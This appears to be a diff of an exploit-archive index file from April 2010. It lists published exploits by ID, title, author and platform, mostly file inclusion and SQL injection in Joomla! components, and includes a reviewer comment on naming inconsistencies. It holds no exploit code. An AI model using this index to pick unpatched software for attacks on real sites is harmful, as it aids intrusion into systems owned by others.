12068,platforms/php/webapps/12068.txt,"Joomla! Component 'com_loginbox' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12069,platforms/php/webapps/12069.txt,"Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12070,platforms/php/webapps/12070.txt,"Joomla! Component 'com_Joomlaupdater' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12071,platforms/php/webapps/12071.txt,"jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2010-04-05,eidelweiss,php,webapps,0
|
||||
12072,platforms/windows/dos/12072.pl,"MyVideoConverter 2.15 - Local Denial of Service",2010-04-05,anonymous,windows,dos,0
|
||||
12073,platforms/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - '.mp3' Local Denial of Service",2010-04-05,anonymous,windows,dos,0
|
||||
12074,platforms/windows/dos/12074.pl,"Portable AVS DVD Authoring 1.3.3.51 - Local Crash (PoC)",2010-04-05,R3d-D3V!L,windows,dos,0
|
||||
12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,php,webapps,0
|
||||
12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps,0
|
||||
12077,platforms/php/webapps/12077.txt,"Joomla! Component News Portal com_news - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12078,platforms/php/webapps/12078.txt,"Joomla! Component FreeStyle FAQ Lite 1.3 com_fss (faqid) - SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0
|
||||
12077,platforms/php/webapps/12077.txt,"Joomla! Component 'com_news_portal' 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12078,platforms/php/webapps/12078.txt,"Joomla! Component 'com_fss' 1.3 - 'faqid' Parameter SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0
|
||||
12079,platforms/windows/dos/12079.pl,"Microsoft Office 2010 Beta - Communicator SIP Denial of Service",2010-04-06,indoushka,windows,dos,0
|
||||
12080,platforms/windows/dos/12080.txt,"Foxit Reader 3.2.1.0401 - Denial of Service",2010-04-06,juza,windows,dos,0
|
||||
12081,platforms/windows/dos/12081.php,"Jzip 1.3 - '.zip' Unicode Buffer Overflow (PoC)",2010-04-06,mr_me,windows,dos,0
|
||||
12082,platforms/php/webapps/12082.txt,"Joomla! Component Saber Cart com_sebercart - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12083,platforms/php/webapps/12083.txt,"Joomla! Component J!WHMCS Integrator com_jwhmcs - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12084,platforms/php/webapps/12084.txt,"Joomla! Component Juke Box com_jukebox - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12085,platforms/php/webapps/12085.txt,"Joomla! Component Joomla! Flickr com_Joomlaflickr - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12086,platforms/php/webapps/12086.txt,"Joomla! Component Highslide JS com_hsconfig - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12087,platforms/php/webapps/12087.txt,"Joomla! Component Fabrik com_fabrik - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12088,platforms/php/webapps/12088.txt,"Joomla! Component Affiliate Feeds com_datafeeds - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12089,platforms/php/webapps/12089.txt,"Joomla! Component Appointment com_appointment - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12082,platforms/php/webapps/12082.txt,"Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12083,platforms/php/webapps/12083.txt,"Joomla! Component 'com_jwhmcs' 1.5.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12084,platforms/php/webapps/12084.txt,"Joomla! Component 'com_jukebox' 1.7 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12085,platforms/php/webapps/12085.txt,"Joomla! Component 'com_Joomlaflickr' 1.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12086,platforms/php/webapps/12086.txt,"Joomla! Component 'com_hsconfig' 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12087,platforms/php/webapps/12087.txt,"Joomla! Component 'com_fabrik' 2.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12088,platforms/php/webapps/12088.txt,"Joomla! Component 'com_datafeeds' 880 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12089,platforms/php/webapps/12089.txt,"Joomla! Component 'com_appointment' 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0
|
||||
12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0
|
||||
12092,platforms/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting",2010-04-06,"Nahuel Grisolia",hardware,webapps,0
|
||||
|
@ -11055,94 +11055,94 @@ id,file,description,date,author,platform,type,port
|
|||
12094,platforms/php/webapps/12094.txt,"ShopSystem - SQL Injection",2010-04-06,Valentin,php,webapps,0
|
||||
12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash",2010-04-06,"Jobert Abma",linux,dos,0
|
||||
12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 - Denial of Service Multiple Files",2010-04-06,anonymous,windows,dos,0
|
||||
12097,platforms/php/webapps/12097.txt,"Joomla! Component XOBBIX - prodid SQL Injection",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12097,platforms/php/webapps/12097.txt,"Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12098,platforms/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting",2010-04-06,"Alejandro Rodriguez",php,webapps,0
|
||||
12100,platforms/asp/webapps/12100.txt,"Espinas CMS - SQL Injection",2010-04-07,"Pouya Daneshmand",asp,webapps,0
|
||||
12101,platforms/php/webapps/12101.txt,"Joomla! Component aWiki com_awiki - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0
|
||||
12102,platforms/php/webapps/12102.txt,"Joomla! Component VJDEO com_vjdeo 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0
|
||||
12101,platforms/php/webapps/12101.txt,"Joomla! Component 'com_awiki' - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0
|
||||
12102,platforms/php/webapps/12102.txt,"Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0
|
||||
12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0
|
||||
12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - '.zip' PoC (SEH)",2010-04-07,ITSecTeam,windows,dos,0
|
||||
12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting - Arbitrary File Upload",2010-04-07,indoushka,php,webapps,0
|
||||
12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,php,webapps,0
|
||||
12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion",2010-04-07,eidelweiss,php,webapps,0
|
||||
12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0
|
||||
12108,platforms/php/webapps/12108.txt,"Joomla! Component 'com_articles' - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0
|
||||
12109,platforms/multiple/dos/12109.txt,"Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution",2010-04-08,ZSploit.com,multiple,dos,0
|
||||
12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos,0
|
||||
12111,platforms/php/webapps/12111.txt,"Joomla! Component Webee Comments - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12113,platforms/php/webapps/12113.txt,"Joomla! Component AWDwall-Joomla! - (cbuser) Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12112,platforms/php/webapps/12112.txt,"Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12114,platforms/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0
|
||||
12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0
|
||||
12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit - Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0
|
||||
12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro com_powermail - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
|
||||
12118,platforms/php/webapps/12118.txt,"Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
|
||||
12119,platforms/windows/remote/12119.pl,"Microsoft Windows FTP Server 1.4 - Authentication Bypass",2010-04-09,chap0,windows,remote,0
|
||||
12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions com_foobla - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
|
||||
12121,platforms/php/webapps/12121.txt,"Joomla! Component JA Voice com_javoice - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
|
||||
12120,platforms/php/webapps/12120.txt,"Joomla! Component 'com_foobla_suggestions' 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
|
||||
12121,platforms/php/webapps/12121.txt,"Joomla! Component 'com_javoice' - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
|
||||
12122,platforms/multiple/remote/12122.txt,"JAVA Web Start - Arbitrary Command-Line Injection",2010-04-09,"Ruben Santamarta ",multiple,remote,0
|
||||
12123,platforms/php/webapps/12123.txt,"Joomla! Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
|
||||
12124,platforms/php/webapps/12124.txt,"Joomla! Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0
|
||||
12123,platforms/php/webapps/12123.txt,"Joomla! Component 'com_pcchess' - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
|
||||
12124,platforms/php/webapps/12124.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-04-09,bumble_be,php,webapps,0
|
||||
12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0
|
||||
12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (Redhat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
|
||||
12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0
|
||||
12132,platforms/php/webapps/12132.pl,"Joomla! Component com_agenda 1.0.1 - 'id' SQL Injection",2010-04-09,v3n0m,php,webapps,0
|
||||
12132,platforms/php/webapps/12132.pl,"Joomla! Component 'com_agenda' 1.0.1 - 'id' Parameter SQL Injection",2010-04-09,v3n0m,php,webapps,0
|
||||
12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0
|
||||
12134,platforms/php/webapps/12134.txt,"MMHAQ CMS - SQL Injection",2010-04-10,s1ayer,php,webapps,0
|
||||
12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0
|
||||
12136,platforms/php/webapps/12136.txt,"Joomla! Component com_properties[aid] - SQL Injection",2010-04-10,c4uR,php,webapps,0
|
||||
12137,platforms/php/webapps/12137.txt,"Joomla! Component allvideos - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0
|
||||
12138,platforms/php/webapps/12138.txt,"Joomla! Component com_Ca - SQL Injection",2010-04-10,DigitALL,php,webapps,0
|
||||
12136,platforms/php/webapps/12136.txt,"Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection",2010-04-10,c4uR,php,webapps,0
|
||||
12137,platforms/php/webapps/12137.txt,"Joomla! Component 'com_allvideos' - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0
|
||||
12138,platforms/php/webapps/12138.txt,"Joomla! Component 'com_ca' - SQL Injection",2010-04-10,DigitALL,php,webapps,0
|
||||
12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine - SQL Injection",2010-04-10,indoushka,php,webapps,0
|
||||
12140,platforms/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,php,webapps,0
|
||||
12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",php,webapps,0
|
||||
12142,platforms/php/webapps/12142.txt,"Joomla! Component TweetLA! - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12143,platforms/php/webapps/12143.txt,"Joomla! Component Ticketbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12144,platforms/php/webapps/12144.txt,"Joomla! Component JA Job Board - Multiple Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12145,platforms/php/webapps/12145.txt,"Joomla! Component Jfeedback! - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12146,platforms/php/webapps/12146.txt,"Joomla! Component JProject Manager - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12147,platforms/php/webapps/12147.txt,"Joomla! Component Preventive And Reservation - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12148,platforms/php/webapps/12148.txt,"Joomla! Component RokModule - 'moduleid' Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12149,platforms/php/webapps/12149.txt,"Joomla! Component spsNewsletter - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12150,platforms/php/webapps/12150.txt,"Joomla! Component AlphaUserPoints - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12151,platforms/php/webapps/12151.txt,"Joomla! Component TRAVELbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12142,platforms/php/webapps/12142.txt,"Joomla! Component 'com_tweetla' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12143,platforms/php/webapps/12143.txt,"Joomla! Component 'com_ticketbook' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12144,platforms/php/webapps/12144.txt,"Joomla! Component 'com_jajobboard' - Multiple Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12145,platforms/php/webapps/12145.txt,"Joomla! Component 'com_jfeedback' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12146,platforms/php/webapps/12146.txt,"Joomla! Component 'com_jprojectmanager' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12147,platforms/php/webapps/12147.txt,"Joomla! Component 'com_preventive' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12148,platforms/php/webapps/12148.txt,"Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12149,platforms/php/webapps/12149.txt,"Joomla! Component 'com_spsnewsletter' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12150,platforms/php/webapps/12150.txt,"Joomla! Component 'com_alphauserpoints' 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12151,platforms/php/webapps/12151.txt,"Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12152,platforms/windows/remote/12152.pl,"Trellian FTP Client - PASV Buffer Overflow",2010-04-11,zombiefx,windows,remote,0
|
||||
12153,platforms/php/webapps/12153.txt,"Joomla! Component education - SQL Injection",2010-04-11,bumble_be,php,webapps,0
|
||||
12153,platforms/php/webapps/12153.txt,"Joomla! Component 'com_education_classess' - SQL Injection",2010-04-11,bumble_be,php,webapps,0
|
||||
12154,platforms/php/dos/12154.txt,"vBulletin 'Cyb - Advanced Forum Statistics' Denial of Service",2010-04-10,"Andhra Hackers",php,dos,0
|
||||
12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0
|
||||
12156,platforms/windows/remote/12156.txt,"Microsoft Internet Explorer/Opera - Source Code viewer Null Character Handling",2010-04-11,"Daniel Correa",windows,remote,0
|
||||
12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0
|
||||
12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL Injection",2010-04-11,"Easy Laster",php,webapps,0
|
||||
12159,platforms/php/webapps/12159.txt,"Joomla! Component Multi-Venue Restaurant Menu Manager - SQL Injection",2010-04-11,Valentin,php,webapps,0
|
||||
12159,platforms/php/webapps/12159.txt,"Joomla! Component 'com_mv_restaurantmenumanager' 1.5.2 - SQL Injection",2010-04-11,Valentin,php,webapps,0
|
||||
12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps,0
|
||||
12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption (PoC)",2010-04-11,LiquidWorm,windows,dos,0
|
||||
12162,platforms/php/webapps/12162.txt,"Joomla! Component mv_restaurantmenumanager - SQL Injection",2010-04-11,Sudden_death,php,webapps,0
|
||||
12162,platforms/php/webapps/12162.txt,"Joomla! Component 'mv_restaurantmenumanager' - SQL Injection",2010-04-11,Sudden_death,php,webapps,0
|
||||
12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS - SQL Injection",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0
|
||||
12164,platforms/php/webapps/12164.txt,"YaPiG 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,php,webapps,0
|
||||
12165,platforms/multiple/dos/12165.txt,"PHP 5.3.0 - getopt() Denial of Service",2010-04-12,Napst3r,multiple,dos,0
|
||||
12166,platforms/php/webapps/12166.txt,"Joomla! Component Web TV com_webtv - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12167,platforms/php/webapps/12167.txt,"Joomla! Component Horoscope com_horoscope - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12168,platforms/php/webapps/12168.txt,"Joomla! Component Arcade Games com_arcadegames - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12169,platforms/php/webapps/12169.txt,"Joomla! Component Flashgames com_Flashgames - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12170,platforms/php/webapps/12170.txt,"Joomla! Component AddressBook com_AddressBook - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12171,platforms/php/webapps/12171.txt,"Joomla! Component Easy Ad Banner com_advertising - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12172,platforms/php/webapps/12172.txt,"Joomla! Component CV Maker com_cvmaker - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12173,platforms/php/webapps/12173.txt,"Joomla! Component My Files com_myfiles - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12174,platforms/php/webapps/12174.txt,"Joomla! Component Online Exam com_onlineexam - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12175,platforms/php/webapps/12175.txt,"Joomla! Component JoomMail com_joommail - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12176,platforms/php/webapps/12176.txt,"Joomla! Component Memory Book com_memory - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12177,platforms/php/webapps/12177.txt,"Joomla! Component Online Market com_market - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12178,platforms/php/webapps/12178.txt,"Joomla! Component Digital Diary com_diary - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12166,platforms/php/webapps/12166.txt,"Joomla! Component 'com_webtv' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12167,platforms/php/webapps/12167.txt,"Joomla! Component 'com_horoscope' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12168,platforms/php/webapps/12168.txt,"Joomla! Component 'com_arcadegames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12169,platforms/php/webapps/12169.txt,"Joomla! Component 'com_Flashgames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12170,platforms/php/webapps/12170.txt,"Joomla! Component 'com_AddressBook' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12171,platforms/php/webapps/12171.txt,"Joomla! Component 'com_advertising' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12172,platforms/php/webapps/12172.txt,"Joomla! Component 'com_cvmaker' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12173,platforms/php/webapps/12173.txt,"Joomla! Component 'com_myfiles' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12174,platforms/php/webapps/12174.txt,"Joomla! Component 'com_onlineexam' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12175,platforms/php/webapps/12175.txt,"Joomla! Component 'com_joommail' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12176,platforms/php/webapps/12176.txt,"Joomla! Component 'com_memory' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12177,platforms/php/webapps/12177.txt,"Joomla! Component 'com_market' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12178,platforms/php/webapps/12178.txt,"Joomla! Component 'com_diary' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusion",2010-04-12,"cr4wl3r ",php,webapps,0
|
||||
12180,platforms/php/webapps/12180.txt,"Joomla! Component com_worldrates - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12181,platforms/php/webapps/12181.txt,"Joomla! Component com_record - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12182,platforms/php/webapps/12182.txt,"Joomla! Component com_sweetykeeper - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12183,platforms/php/webapps/12183.txt,"Joomla! Component com_jdrugstopics - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
|
||||
12184,platforms/php/webapps/12184.txt,"Joomla! Component com_sermonspeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
|
||||
12185,platforms/php/webapps/12185.txt,"Joomla! Component com_flexicontent - Local File",2010-04-12,eidelweiss,php,webapps,0
|
||||
12180,platforms/php/webapps/12180.txt,"Joomla! Component 'com_worldrates' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12181,platforms/php/webapps/12181.txt,"Joomla! Component 'com_record' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12182,platforms/php/webapps/12182.txt,"Joomla! Component 'com_sweetykeeper' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12183,platforms/php/webapps/12183.txt,"Joomla! Component 'com_jdrugstopics' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
|
||||
12184,platforms/php/webapps/12184.txt,"Joomla! Component 'com_sermonspeaker' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
|
||||
12185,platforms/php/webapps/12185.txt,"Joomla! Component 'com_flexicontent' - Local File",2010-04-12,eidelweiss,php,webapps,0
|
||||
12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-12,"cr4wl3r ",php,webapps,0
|
||||
12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos,0
|
||||
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
|
||||
12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles - (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
|
||||
12191,platforms/php/webapps/12191.txt,"Joomla! Component com_jp_jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps,0
|
||||
12190,platforms/php/webapps/12190.txt,"Joomla! Component 'com_jvehicles' - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
|
||||
12191,platforms/php/webapps/12191.txt,"Joomla! Component 'com_jp_jobs' 1.2.0 - 'id' Parameter SQL Injection",2010-04-13,v3n0m,php,webapps,0
|
||||
12192,platforms/php/webapps/12192.txt,"Blog System 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0
|
||||
12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0
|
||||
12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0
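Review bot: Three of the retitled rows in this hunk do not follow the quoted `'com_<name>'` form that the other renamed rows use. Row 12113 reads `Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection` without quotes and should presumably be `'com_awdwall' 1.5.4`; row 12162 is quoted as `'mv_restaurantmenumanager'` while row 12159 names what looks like the same component as `'com_mv_restaurantmenumanager'`; and row 12185 still ends in `Local File`, which appears to be a truncated `Local File Inclusion`. Anyone matching installed components against this index by the quoted name or by vulnerability class would miss these rows, so they are worth fixing in the same normalisation pass. The old/new side of each row is inferred from print order, since the `+`/`-` markers are not visible on this page.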
|
||||
|
@ -11150,7 +11150,7 @@ id,file,description,date,author,platform,type,port
|
|||
12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - DataBase Download",2010-04-13,indoushka,asp,webapps,0
|
||||
12198,platforms/php/webapps/12198.txt,"Games Script - (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0
|
||||
12199,platforms/asp/webapps/12199.txt,"My School Script - Data Base Download",2010-04-13,indoushka,asp,webapps,0
|
||||
12200,platforms/php/webapps/12200.txt,"Joomla! Component com_QPersonel - SQL Injection",2010-04-13,Valentin,php,webapps,0
|
||||
12200,platforms/php/webapps/12200.txt,"Joomla! Component 'com_QPersonel' - SQL Injection",2010-04-13,Valentin,php,webapps,0
|
||||
12201,platforms/windows/dos/12201.html,"MagnetoSoft DNS 4.0.0.9 - ActiveX DNSLookupHostWithServer (PoC)",2010-04-13,s4squatch,windows,dos,0
|
||||
12202,platforms/windows/remote/12202.html,"MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry Buffer Overflow",2010-04-13,s4squatch,windows,remote,0
|
||||
12203,platforms/windows/remote/12203.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpGetReply Buffer Overflow",2010-04-13,s4squatch,windows,remote,0
|
||||
|
@ -11173,16 +11173,16 @@ id,file,description,date,author,platform,type,port
|
|||
12227,platforms/php/webapps/12227.txt,"YUI Images Script - Arbitrary File Upload",2010-04-14,Mr.P3rfekT,php,webapps,0
|
||||
12228,platforms/windows/dos/12228.py,"MovieLibrary 1.4.401 - Local Denial of Service (.dmv)",2010-04-14,anonymous,windows,dos,0
|
||||
12229,platforms/windows/dos/12229.py,"Book Library 1.4.162 - Local Denial of Service (.bkd)",2010-04-14,anonymous,windows,dos,0
|
||||
12230,platforms/php/webapps/12230.txt,"Joomla! Component wgPicasa com_wgpicasa - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
